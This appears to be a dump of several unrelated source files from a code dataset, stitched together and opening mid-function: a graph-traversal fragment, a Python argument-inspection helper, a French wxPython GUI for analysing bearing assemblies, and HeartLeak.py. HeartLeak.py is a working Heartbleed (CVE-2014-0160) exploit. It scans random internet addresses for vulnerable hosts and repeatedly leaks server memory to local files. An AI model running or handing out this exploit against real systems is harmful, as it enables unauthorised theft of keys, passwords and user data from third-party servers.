if ns[0] == previous:
previous = current
current = ns[1]
else:
previous = current
current = ns[0]
# Edge Case: You looped without finding ANY intersections? Eww.
if current == first:
return previous
# look around for you next traveling position
ns = self._find_unblocked_neighbors(current)
return current
|
gpl-3.0
| 9,002,926,573,663,842,000 | 37.1875 | 97 | 0.562541 | false |
Nekmo/nekutils
|
survey.py
|
1
|
1674
|
# coding=utf-8
from inspect import getargspec
from .iter import append_or_update
def kwargs_function(function):
argspec = getargspec(function)
kwarg_names = argspec.args[-len(argspec.defaults):]
return {kwarg_name: argspec.defaults[i] for i, kwarg_name in enumerate(kwarg_names)}
class InspectFunction(object):
vargs = None
keywords = None
def __init__(self):
self.arg_types = []
self.kwarg_types = []
def set_arg_types(self, arg_types):
append_or_update(self.arg_types, arg_types)
def set_kwarg_types(self, kwarg_types):
append_or_update(self.kwarg_types, kwarg_types)
def set_from_function(self, function):
argspec = getargspec(function)
self.vargs = argspec.varargs
self.keywords = argspec.keywords
arg_types, kwargs_types = argspec.args, argspec.defaults
if kwargs_types:
append_or_update(self.kwarg_types, map(self.get_type, kwargs_types), False)
# añado el argumento si no hay para la posición, pero si no no lo modifico
# Le quito 1 porque el primer argumento es "msg", el objeto Msg
arg_types = arg_types if not kwargs_types else arg_types[:-len(kwargs_types)]
append_or_update(self.arg_types, [str] * (len(arg_types) - 1), False)
def get_type(self, value):
if hasattr(value, '__call__'):
return value
elif hasattr(value.__class__, '__call__'):
return value.__class__
else:
return str
def get_type_name(self, type):
try:
return type.__name__
except Exception:
return type.__class__.__name__
|
mit
| 3,462,597,411,575,574,000 | 32.46 | 88 | 0.619019 | false |
OffensivePython/HeartLeak
|
HeartLeak.py
|
1
|
8184
|
#!/usr/bin/env python27
#=========================================================#
# [+] Title: HeartLeak (CVE-2014-0160) #
# [+] Script: HeartLeak.py #
# [+] Twitter: https://twitter.com/OffensivePython #
# [+] Blog: http://pytesting.blogspot.com #
#=========================================================#
import socket
import struct
import sys
import time
import random
import threading
from optparse import OptionParser
class heartleak(object):
def __init__(self, host, port=443, verbose=False):
try:
self.sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sick.connect((host, port))
except socket.error:
return None
self.hello="\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d"
self.hello+="\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc"
self.hello+="\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14"
self.hello+="\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f"
self.hello+="\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16"
self.hello+="\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e"
self.hello+="\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04"
self.hello+="\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05"
self.hello+="\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06"
self.hello+="\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02"
self.hello+="\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c"
self.hello+="\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07"
self.hello+="\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02"
self.hello+="\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01"
self.hello+="\x01"
self.hb="\x18\x03\x02\x00\x03\x01\xFF\xEC"
self.verbose=verbose
def receive(self, op):
data=''
chunk=''
typ, version, length = None, None, None
try:
data=self.sick.recv(5)
except socket.error:
return None, None, None
if data:
typ, version, length = struct.unpack('>BHH', data)
if typ==None:
return None, None, None
else:
if op==1: # handshake
data=self.sick.recv(length)
else: # heartbeat
# recveive all data sent by the server
while True:
try:
chunk = self.sick.recv(0xFFFF)
data+=chunk
except socket.error:
break
return typ, version, data
else:
return None, None, None
def handshake(self):
self.sick.send(self.hello) # send handshake
while True:
if self.verbose:
print("[+] Sending SSL Handshake")
typ, version, payload = self.receive(1)
if typ==None:
if self.verbose:
print("[-] Host doesn't support OpenSSL")
return None
if typ==22 and ord(payload[0])==0x0E:
if self.verbose:
print("[+] Received Hello back")
# Received hello back
break
return True
def heartbeat(self):
if self.verbose:
print("[+] Sending malicious heartbeat request")
self.sick.send(self.hb)
while True:
typ, version, payload = self.receive(2)
if typ==None or typ==21:
return False
if typ==24:
if len(payload)>3:
return payload
else:
return False
def destroy(self):
""" Close connection """
if self.verbose:
print("[+] Closing Connection")
self.sick.close()
def leakTest(hFile, host, port=443):
global n
sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sick.connect((host, port))
sick.close()
print("[+] %s supports SSL, trying to trigger the bug"%host)
target=heartleak(host)
if target and target.handshake():
if target.heartbeat():
print("-{#}-- %s is vulnerable -{#}--"%host)
if port==443:
hFile.write(host+'\r\n')
else:
hFile.write(host+":"+port+'\r\n')
n-=1
if n>0:
print("[+] Still looking for %d vulnerable hosts"%n)
target.destroy()
except socket.error:
sick.close()
pass
def scan(nhost, port, nthread):
hFile=open("heartleaked.log", "a")
global n
print("[+] Running a scan to find %d vulnerable host(s). Be patient!"%nhost)
n=nhost
while n>0:
try:
ip=randomHost()
try:
while threading.activeCount()>nthread:
time.sleep(5)
t=threading.Thread(target=leakTest, args=(hFile, ip, port))
t.start()
except:
time.sleep(5)
except KeyboardInterrupt:
print("[-] Cancelled due to keyboard interruption")
break
hFile.close()
return
def getStrings(data):
length=len(data)
printable=''
i=0
while i<length:
j=i
while ord(data[j])>31 and ord(data[j])<127 and j<length-1:
j+=1
if j-i>3: # if found a string of 4 bytes or more
printable+=data[i:j]+"\r\n"
i=j
else:
i+=1
return printable
def monitor(host, port):
print("-{# Sniffing data from %s"%host)
print("-{# Printable data will be stored in %s"%host+".txt")
print("-{# Raw data will be stored in %s"%host+".bin")
ascii=open(host+".txt", "a")
binary=open(host+".bin", "wb")
while True:
target=heartleak(host, port, verbose=True)
if target and target.handshake():
try:
leaked=target.heartbeat()
binary.write(leaked)
strings=getStrings(leaked)
ascii.write(strings)
print(strings)
time.sleep(10)
except KeyboardInterrupt:
target.destroy()
break
ascii.close()
binary.close()
def randomHost():
""" Generates a random IP address """
host=str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
return host
def main():
usage="Usage: %prog arg [options]\n"
usage+="Example:\n"
usage+=" %prog monitor --server=example.com\n"
usage+=" %prog scan --nhost=10 --threads=50\n"
parser=OptionParser(usage)
parser.add_option("-n", "--nhost", dest="nhost", type="int",
help="Number of Hosts", default=1)
parser.add_option("-t", "--threads", dest="nthread", type="int",
help="Number of threads (Default: 10 threads)",
default=10)
parser.add_option("-s", "--server", dest="host", type="string",
help="Target (IP Address) to monitor")
parser.add_option("-p", "--port", dest="port", type="int",
help="Port number (default: 443)", default=443)
options, args=parser.parse_args()
socket.setdefaulttimeout(10)
if len(args)>0:
port=options.port
if args[0]=="scan":
nhost=options.nhost
nthread=options.nthread
scan(nhost, port, nthread)
elif args[0]=="monitor" and options.host:
host=options.host
monitor(host, port)
else:
parser.print_help()
else:
parser.print_help()
if __name__=="__main__":
main()
|
mit
| -6,978,767,676,816,364,000 | 33.825532 | 86 | 0.516984 | false |
cedrick-f/pyVot
|
src/Analyse.py
|
1
|
198562
|
#!/usr/bin/env python
# -*- coding: ISO-8859-1 -*-
##This file is part of PyVot
#############################################################################
#############################################################################
## ##
## Analyse ##
## ##
#############################################################################
#############################################################################
## Copyright (C) 2006-2009 Cédrick FAURY
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import wx # This module uses the new wx namespace
import wx.lib.buttons as buttons
import wx.lib.stattext as st
import wx.grid as gridlib
#from wx.lib.wordwrap import wordwrap
#from textwrap import fill
import Const
import globdef
from globdef import *
import Montage
import Images, Icones
import time
from math import sin,pi,cos
from Affichage import DCPlus
StyleText = {}
Couleur = {}
def charger_styleText():
Couleur["rouge"] = wx.RED
Couleur["vert"] = wx.ColourDatabase().Find("FOREST GREEN")
Couleur["bleu"] = wx.BLUE
StyleText["Titre1"] = Const.StyleDeTexte(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, True),wx.BLUE)
StyleText["Titre2"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False),wx.BLACK)
StyleText["Messag"] = Const.StyleDeTexte(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False),wx.RED)
StyleText["Normal"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False),wx.BLACK)
StyleText["Message"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.ITALIC, wx.NORMAL, False),wx.BLACK)
StyleText["Gras"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False),wx.BLACK)
#####################################################
# Zone de résultats ###############################
#####################################################
class ZoneResultats(wx.Panel):
def __init__(self, parent, analyse, liaison = True):
wx.Panel.__init__(self, parent, -1)
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
self.parent = parent
self.analyse = analyse
# print self.analyse
# Structure principale
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.boutons = {}
self.statBox = {}
self.statBoxSizer = {}
self.boutonSizer = {}
if liaison and analyse.montageVide:
self.MessagePasDeRoulement()
self.Bind(wx.EVT_BUTTON, self.OnClick)
############################################################
def MessagePasDeRoulement(self):
StyleText["Message"].applique(self, wx.BLACK)
txt = StaticTextWrapped(self, -1, u"Il faut au moins un roulement pour faire une liaison pivot !",
style = wx.ALIGN_CENTRE)
self.sizer.Add(txt) #, (0,0), (1,1), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
self.SetSizerAndFit(self.sizer)
#############################################################
def OnClick(self, event):
return
#############################################################
def MakeStaticBox(self, id, titre, style = wx.VERTICAL):
StyleText["Titre1"].applique(self)
self.statBox[id] = wx.StaticBox(self, -1, titre)
self.statBoxSizer[id] = wx.StaticBoxSizer(self.statBox[id], style)
self.sizer.Add(self.statBoxSizer[id], flag = wx.ALIGN_CENTRE|wx.EXPAND)
def MakeBoutonSizer(self, id, h = 1, v = 1):
self.boutonSizer[id] = wx.GridBagSizer(h,v)
self.statBoxSizer[id].Add(self.boutonSizer[id], flag = wx.ALIGN_CENTRE)
# self.Add(id, self.boutonSizer[id])
def StaticTextMessage(self, message, style = "Messag", wrapFact = None):
StyleText[style].applique(self, Couleur[message.coul])
stw = StaticTextWrapped(self, -1, message.mess)
if wrapFact != None:
stw.SetWrapFact(wrapFact)
return stw
def Add(self, id, objet, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 10):
self.statBoxSizer[id].Add(objet, flag = flag, border = border)
def AddBouton(self, id, objet, pos, span = (1,1), flag = wx.ALIGN_CENTRE):
self.boutonSizer[id].Add(objet, pos, span, flag = flag)
#####################################################
# Immobilisation axiale #############################
#####################################################
class ZoneImmobAx(ZoneResultats):
def __init__(self, parent, analyse):
# print "Zone ImmobAx"
ZoneResultats.__init__(self, parent, analyse),
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
# print analyse.chaineAct[0]
if analyse.montageVide:
return
self.Freeze()
self.labels = {}
self.MakeStaticBox("1", u"Mise en position axiale")
# Resultat principal
#####################
self.Add("1", self.StaticTextMessage(analyse.messageImmobilisation))
# Boutons
#####################
self.MakeBoutonSizer("1", 4,10)
c = 0
for s in [1,0]: # différents sens ...
sizerResult = wx.BoxSizer(wx.VERTICAL)
for mess in analyse.resultatImmobilisation[s]:
sizerResult.Add(self.StaticTextMessage(mess, style = "Normal", wrapFact = 2))
self.AddBouton("1", sizerResult,
(0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# Bouton "Animer"
#----------------
# if True:#parent.master.options.proposerAnimArret.get() == 1 \
if analyse.resultatImmobilisation[s][0].clef == 'ArretArbreSens':
tag = "Arret"+ str(s)
self.boutons[tag] = buttons.ThemedGenBitmapButton(self, 10+s ,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons[tag].SetToolTipString(Const.bulles['AnalyAnim'])
# Bouton "Chaine"
#----------------
# elif True:#parent.master.options.proposerChaines.get() == 1 \
elif analyse.resultatImmobilisation[s][0].clef == 'ImmobCorrect':
tag = "Chaine"+ str(s)
self.boutons[tag] = buttons.ThemedGenBitmapToggleButton(self, 20+s,
None,
style = wx.BORDER_NONE)
self.boutons[tag].SetBitmapLabel(Images.Img_BoutonMont(tag))
self.boutons[tag].SetInitialSize()
self.boutons[tag].SetToolTipString(Const.bulles['AnalyChai'])
# On place les widgets ...
#-------------------------
if self.boutons.has_key(tag):
self.AddBouton("1", self.boutons[tag], (1,c), (1,2))
# sizerBoutons.Add(self.boutons[tag], (1,c), (1,2), flag = wx.ALIGN_CENTRE)
# # Label "Hyperstatique"
# #----------------------
## if parent.master.options.proposerChaines.get() == 1 \
# if len(analyse.resultatImmobilisation[s])>1:
# StyleText["Messag"].applique(self, analyse.resultatImmobilisation[s][1].coul)#"bleu")
# self.labels["Hyper"] = wx.StaticText(self, -1,
# analyse.resultatImmobilisation[s][1].mess)
# self.AddBouton("1", self.labels["Hyper"], (3,c), (1,2))
## sizerBoutons.Add(self.labels["Hyper"], (3,c), (1,2), flag = wx.ALIGN_CENTRE)
# self.labels["Hyper"].SetToolTipString(Const.bulles['AnalyHypr'])
tag = None
c += 2
# Schéma de structure
#--------------------
self.MakeStaticBox("2", u"Schéma de structure")
self.Add("2", wx.StaticBitmap(self, -1, analyse.imageSchema),
flag = wx.ALIGN_CENTRE, border = 0)
self.SetSizerAndFit(self.sizer)
self.Thaw()
self.Refresh()
def initAffichage(self, zmont = None):
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
# def OnSize(self, event = None):
## print self.GetClientSizeTuple()[0]
# self.txt.SetLabel(self.txt.GetLabel().replace('\n',' '))
## self.txt.SetLabel(self.mess)
# self.txt.Wrap(self.GetClientSizeTuple()[0])
## self.txt.Wrap(-1)
# self.Fit()
# event.Skip()
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
# print "Click",id, act
if id in [10,11]:
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act )
#####################################################
# Résistance aux Charges ############################
#####################################################
class ZoneResistance(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse)
if analyse.montageVide:
return
self.Freeze()
# Résistance axiale du montage
#####################################################
self.MakeStaticBox("1", u"Résistance axiale du montage")
# Resultat principal
self.Add("1", self.StaticTextMessage(analyse.messageResistanceAxiale))
# Boutons
self.MakeBoutonSizer("1", 4,10)
self.listeActive = {}
for s in [1,0]:
c = 1-s # Colonne du sizerMtg
sizerResult = wx.BoxSizer(wx.VERTICAL)
for mess in analyse.resultatEffortAxialMtg[s]:
sizerResult.Add(self.StaticTextMessage(mess, style = "Normal", wrapFact = 2))
self.AddBouton("1", sizerResult,
(0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# Bouton "Détail"
#----------------
# if parent.master.options.proposerChaines.get() == 1 \
if analyse.resultatEffortAxialMtg[s][0].clef == 'ElemResistPas':
tag = "_Chaine"+ str(s)
if True:#master.master.options.proposerChaines.get() <> 0 :
self.boutons["_"+tag] = buttons.ThemedGenBitmapToggleButton(self, 30+s,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyChai'])
# self.listeActive[s] = ListeActive(self, self.lstNom(s), self.boutons["_"+tag])
# self.listeActive[s].SetToolTipString(Const.bulles['SelectRoul'])
# self.AddBouton("1", self.listeActive[s].symboleDevelop, (1,c),(1,1),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("1", self.listeActive[s], (2+c,0), (1,2),
# wx.ALIGN_CENTRE|wx.ALIGN_TOP)
rr = 2
# Bouton "Chaine"
#----------------
# elif parent.master.options.proposerChaines.get() == 1 \
elif analyse.resultatEffortAxialMtg[s][0].clef in ['ChargeAxOk']:
tag = "Chaine"+ str(s)
if True:#parent.master.options.proposerChaines.get() <> 0 :
self.boutons["_"+tag] = buttons.ThemedGenBitmapToggleButton(self, 20+s,
None,
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetBitmapLabel(Images.Img_BoutonMont(tag))
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyChai'])
# Bouton "Animer"
#----------------
# elif parent.master.options.proposerAnimArret.get() == 1 \
elif analyse.resultatEffortAxialMtg[s][0].clef == 'ArretArbreSens':
tag = "Arret"+ str(s)
self.boutons["_"+tag] = buttons.ThemedGenBitmapButton(self, 10+s,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyAnim'])
# On place les widgets ...
#-------------------------
if self.boutons.has_key("_"+tag):
self.AddBouton("1", self.boutons["_"+tag], (1,c), (1,1), wx.ALIGN_CENTRE)
tag = None
# Résistance des roulements
########################################################################
self.MakeStaticBox("2", u"Résistance des roulements")
# Message général
self.Add("2", self.StaticTextMessage(analyse.messageResistanceRlt), border = 10)
# Schéma de structure
self.Add("2", wx.StaticBitmap(self, -1, analyse.imageSchemaCharges),
flag = wx.ALIGN_CENTRE, border = 0)
# Messages par roulement
# self.MakeBoutonSizer("2",1,20)
table = Tableau(self)
table.SetColLabelValue(0, u"Roulement gauche")
table.SetColLabelValue(1, u"Roulement droit")
table.SetRowLabelSize(1)
table.SetRowLabelAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
# table.SetRowLabelValue(0, u"Type\nde charge")
# table.SetRowLabelValue(1, u"Résistance\ndu roulement")
c = 0
for p in ["G","D"]:
l = 0
if analyse.resultatResistanceRlt[p] is not None:
table.SetCellValue(1,c, Const.typeCharge[analyse.typeCharge[p]])
table.SetCellTextColour(1,c, wx.BLACK)
if analyse.typeCharge[p] <> 0:
table.SetCellValue(0,c, analyse.resultatResistanceRlt[p].mess)
table.SetCellTextColour(0,c, Couleur[analyse.resultatResistanceRlt[p].coul])
c += 1
table.Fit()
table.ForceRefresh()
size = 0
for c in range(table.GetNumberCols()):
if size < table.GetColSize(c):
size = table.GetColSize(c)
colmax = c
# print colmax, table.GetColSize(colmax)
table.SetColSize(1-colmax, table.GetColSize(colmax))
# table.SetColSize(table)
table.Fit()
table.ForceRefresh()
# flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM
self.Add("2", table, flag = wx.ALIGN_CENTRE, border = 0)
self.tableResist = table
# c = 0
# for p in ["G","D"]:
# if analyse.resultatResistanceRlt[p] is not None:
#
# # Type de charge
# #---------------
# StyleText["Titre2"].applique(self)
# txt = wx.StaticText(self, -1, Const.typeCharge[analyse.typeCharge[p]],
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
#
# # Label "Résultat"
# #----------------
# if analyse.typeCharge[p] <> 0:
# StyleText["Messag"].applique(self, Couleur[analyse.resultatResistanceRlt[p].coul])
# txt = wx.StaticText(self, -1, analyse.resultatResistanceRlt[p].mess,
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (1,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# c += 1
#
self.SetSizerAndFit(self.sizer)
self.Thaw()
def initAffichage(self, zmont = None):
# print "initAffichage Resistance"
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
#############################################################################
def lstNom(self, sens):
message = self.parent.analyse.resultatEffortAxialMtg[sens][1].mess
lst = []
pos = Montage.PositionDansPivot()
for res in self.parent.analyse.lstElemResistePas[sens]:
lst.append(pos.traduireEnTexte(res))
return {'mess' : message, 'lst' : lst}
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
if id in [10,11]:
idOpp = "__Chaine"+ str(11-id)
if self.boutons.has_key(idOpp):
self.boutons[idOpp].SetToggle(False)
self.OnClick(id = 41-id, act = False)
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act)
elif id in [30,31]:
if act is None: act = event.GetIsDown()
self.parent.gererSurBrillanceArrets(id-30, act)
# self.listeActive[id-30].Montrer(act)
self.Layout()
self.Update()
#####################################################
# Montage ###########################################
#####################################################
class ZoneMontabilite(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse)
self.analyse = analyse
if analyse.montageVide:
return
self.Freeze()
#####################################################
# Message principal (montabilité globale)
#####################################################
self.txt = self.StaticTextMessage(analyse.resultatMontabilite)
self.sizer.Add(self.txt, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 10)
#####################################################
# Montabilité de l'ensemble monté "libre"
#####################################################
if analyse.cdcf.bagueTournante == "I": ens = u"""arbre"""
else: ens = u"""alésage"""
self.MakeStaticBox("1", u"Montabilité de l'ensemble " + ens)
self.MakeBoutonSizer("1",0,0)
StyleText["Titre2"].applique(self)
cbs = wx.BoxSizer(wx.HORIZONTAL)
cb = wx.CheckBox(self, -1, " ")
cb.SetValue(analyse.demonterRltSerres)
self.Bind(wx.EVT_CHECKBOX, self.EvtCheckBox, cb)
cbs.Add(cb)
txt = StaticTextWrapped(self, -1, u"Ne pas tenir compte des roulements montés serrés")
txt.marge = 40
cbs.Add(txt)
self.Add("1", cbs)
#####################################################
# Montabilité des roulements sur l'ensemble monté "serré
#####################################################
self.MakeStaticBox("2", u"Montabilité des roulements")
self.MakeBoutonSizer("2",0,0)
StyleText["Titre2"].applique(self)
if self.analyse.mtg.palier["G"].rlt.num is not None:
txt = wx.StaticText(self, -1, u"gauche", style = wx.ALIGN_CENTRE)
self.AddBouton("2", txt, (0,0), (1,2), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
if self.analyse.mtg.palier["D"].rlt.num is not None:
txt = wx.StaticText(self, -1, u"droite", style = wx.ALIGN_CENTRE)
self.AddBouton("2", txt, (0,2), (1,2), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
#####################################################
# Options
#####################################################
# self.MakeStaticBox("3", u"Options", wx.HORIZONTAL)
# self.MakeBoutonSizer("3",0,0)
# StyleText["Titre2"].applique(self)
# cb = wx.CheckBox(self, -1, " ")
# cb.SetValue(analyse.demonterRltSerres)
# self.Bind(wx.EVT_CHECKBOX, self.EvtCheckBox, cb)
# self.Add("3", cb)
# txt = StaticTextWrapped(self, -1, u"Ne pas tenir compte des roulements montés sérrés")
# txt.marge = 40
# self.Add("3", txt)#, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM|wx.LEFT)
#####################################################
# Tous les boutons ...
#####################################################
# Ensemble
dl = 2
for tag, pos in [["AnimEnsb1", (0,0)],
["AnimEnsb0", (0,2)]]:
lstObs = analyse.obstacleEnsble[eval(tag[8])]
# if analyse.obstacleEnsble[eval(tag[8])] <> []:
# lstObs.append(analyse.obstacleEnsble[eval(tag[8])])
# for p in ["G","D"]:
# if analyse.obstacleEnsble[eval(tag[8])][p] <> ():
# lstObs.append(analyse.obstacleEnsble[eval(tag[8])][p])
if lstObs <> []: typeAction = 'obstacle'
else: typeAction = 'demonte'
# Le bouton ...
self.boutons[tag] = BoutonMontage(self,
tag = tag,
typeAction = typeAction,
analyse = analyse,
lstObs = lstObs)
self.AddBouton("1", self.boutons[tag], pos, flag = wx.ALIGN_CENTRE)
# # La zone "liste active" ...
# if typeAction == 'obstacle':
# self.AddBouton("1", self.boutons[tag].listeActive.symboleDevelop, (pos[0]+1,pos[1]), (1,2),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("1", self.boutons[tag].listeActive, (pos[0]+dl, 0), (1,4),
# wx.ALIGN_CENTRE|wx.ALIGN_TOP|wx.EXPAND)
# dl += 1
# Roulements
dl = 2
for tag, pos in [["AnimRltG0",(1,1)], \
["AnimRltG1",(1,0)], \
["AnimRltD0",(1,3)], \
["AnimRltD1",(1,2)]] :
lstObs = analyse.obstacleRoults[tag[7]][eval(tag[8])]
if lstObs <> []: typeAction = 'obstacle'
else: typeAction = 'demonte'
# Le bouton ...
if self.analyse.mtg.palier[tag[7]].rlt.num is not None:
self.boutons[tag] = BoutonMontage(self,
tag = tag,
typeAction = typeAction,
analyse = analyse,
lstObs = lstObs)
self.AddBouton("2", self.boutons[tag], pos, flag = wx.ALIGN_CENTRE)
# # La zone "liste active" ...
# if typeAction == 'obstacle':
# self.AddBouton("2", self.boutons[tag].listeActive.symboleDevelop, (pos[0]+1,pos[1]), (1,1),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("2", self.boutons[tag].listeActive, (pos[0]+dl, 0), (1,4),
# wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_TOP|wx.EXPAND)
# dl += 1
c = 0
for p in ["G", "D"]:
if p in analyse.obstacleBagueIsolee.keys() > 0:
tag = "BagueIsolee"+p
self.boutons[tag] = buttons.ThemedGenBitmapToggleButton(self, 100+c,
Images.Img_BoutonMont('BagueIsolee'),
style = wx.BORDER_NONE)
self.boutons[tag].SetInitialSize()
# self.SetBitmapLabel(Images.Img_BoutonMont(tag+self.rad))
self.AddBouton("2", self.boutons[tag], (2,c), (1,2), flag = wx.ALIGN_CENTRE)
self.boutons[tag].SetToolTipString(u"Cliquer pour visualiser la bague de roulement qui ne peut pas être démontée.")
self.Bind(wx.EVT_BUTTON, self.montrerBaguesIsolee, self.boutons[tag])
c += 2
self.gererActivationBoutons()
self.SetSizerAndFit(self.sizer)
self.Thaw()
# ############################################################################
# def OnClick(self, event):
# id = event.GetId()
# if id in [10,11]:
# idOpp = "__Chaine"+ str(11-id)
# if self.boutons.has_key(idOpp):
# self.boutons[idOpp].SetToggle(False)
# self.parent.animerElemNonArretes(id-10)
# elif id in [20,21]:
# self.parent.gererAffichageChaines(event)
# elif id in [30,31]:
# self.parent.gererSurBrillanceArrets(event, id-30)
def EvtCheckBox(self, event):
# print self.analyse.demonterRltSerres, "-->", event.IsChecked()
self.analyse.analyserMontabilite(event.IsChecked(), self.parent.zoneMtg)
self.parent.ReplacePage(2)
def initAffichage(self, zoneMtg):
# print "Init affichage ZoneMont"
self.initAffichageSurbrillance()
self.analyse.elemDemonte = []
# On remonte tout instantanément
for i in zoneMtg.lstItemMtg:
if hasattr(i,"x"):
i.pos = (i.x,i.pos[1])
i.normale()
self.initEtatBoutons()
self.gererActivationBoutons()
zoneMtg.Redessiner(self.analyse)
def initEtatBoutons(self):
for b in self.boutons.values():
b.SetToggle(False)
def initAffichageSurbrillance(self):
for b in self.boutons.values():
if isinstance(b, BoutonMontage) and b.typeAction == 'obstacle':
b.Actionner(False)
self.Refresh()
self.Update()
#############################################################################
def gererActivationBoutons(self):
""" Change l'état normal des boutons d'animation de la montabilité """
# print
# print "Gestion Activation Boutons", self.analyse.elemDemonte,self.boutons["AnimEnsb1"].GetValue()
# if self.parent.master.options.proposerAnimMont.get() == 0:
# return
### Boutons "Ensemble"
if "AnimEnsb0" in self.analyse.elemDemonte or self.boutons["AnimEnsb0"].GetValue():
self.boutons["AnimEnsb1"].Active(False)
elif "AnimEnsb1" in self.analyse.elemDemonte or self.boutons["AnimEnsb1"].GetValue():
self.boutons["AnimEnsb0"].Active(False)
else:
self.boutons["AnimEnsb0"].Active(True)
self.boutons["AnimEnsb1"].Active(True)
### Boutons "Roulements"
if "AnimEnsb0" in self.analyse.elemDemonte \
or "AnimEnsb1" in self.analyse.elemDemonte:
etat = True
else:
etat = False
for t in self.boutons.keys():#["AnimRltG0","AnimRltG1","AnimRltD0","AnimRltD1"]:
if t[:7] == "AnimRlt":
self.boutons[t].Active(etat)
elif t[:-1] == "BagueIsolee":
self.boutons[t].Enable(not etat)
###
for p in ["G","D"]:
if "AnimRlt"+p+"0" in self.analyse.elemDemonte:
self.boutons["AnimRlt"+p+"1"].Active(False)
if "AnimRlt"+p+"1" in self.analyse.elemDemonte:
self.boutons["AnimRlt"+p+"0"].Active(False)
self.Layout()
self.Refresh()
self.Update()
# self.UpdateWindowUI()
# #############################################################################
# def activerDesactiverBoutons_Montage(self):
